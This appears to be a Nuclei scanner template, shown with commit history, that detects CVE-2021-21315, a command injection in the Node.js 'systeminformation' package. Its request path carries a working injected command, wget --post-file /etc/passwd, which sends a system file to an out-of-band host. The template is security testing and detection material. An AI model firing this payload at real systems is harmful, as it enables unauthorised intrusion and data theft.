nuclei-templates/http/cves/2021/CVE-2021-21315.yaml

54 lines
1.9 KiB
YAML
Raw Normal View History

2021-03-02 11:02:08 +00:00
id: CVE-2021-21315
info:
name: Node.JS System Information Library <5.3.1 - Remote Command Injection
2021-03-02 11:02:08 +00:00
author: pikpikcu
severity: high
description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
2023-09-06 12:09:01 +00:00
remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
reference:
2021-03-24 06:48:11 +00:00
- https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- https://security.netapp.com/advisory/ntap-20210312-0007/
- https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v
- https://www.npmjs.com/package/systeminformation
- https://nvd.nist.gov/vuln/detail/CVE-2021-21315
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
2023-08-31 11:46:18 +00:00
epss-score: 0.97213
epss-percentile: 0.99738
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: systeminformation
product: systeminformation
2023-09-06 12:09:01 +00:00
framework: node.js
2023-07-11 19:49:27 +00:00
tags: nodejs,cve,cve2021,kev
2021-03-02 11:02:08 +00:00
http:
2021-03-02 11:02:08 +00:00
- method: GET
path:
2022-03-21 20:16:15 +00:00
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"
2021-03-02 11:02:08 +00:00
matchers-condition: and
matchers:
- type: word
2022-06-28 02:57:07 +00:00
part: body
2021-03-02 11:02:08 +00:00
words:
2022-03-21 20:16:15 +00:00
- "wget --post-file /etc/passwd {{interactsh-url}}"
2021-03-04 14:55:34 +00:00
- name
- running
- pids
2021-03-02 11:02:08 +00:00
condition: and
2022-06-28 02:57:07 +00:00
- type: word
part: header
words:
- "application/json"
2021-03-02 11:02:08 +00:00
- type: status
status:
- 200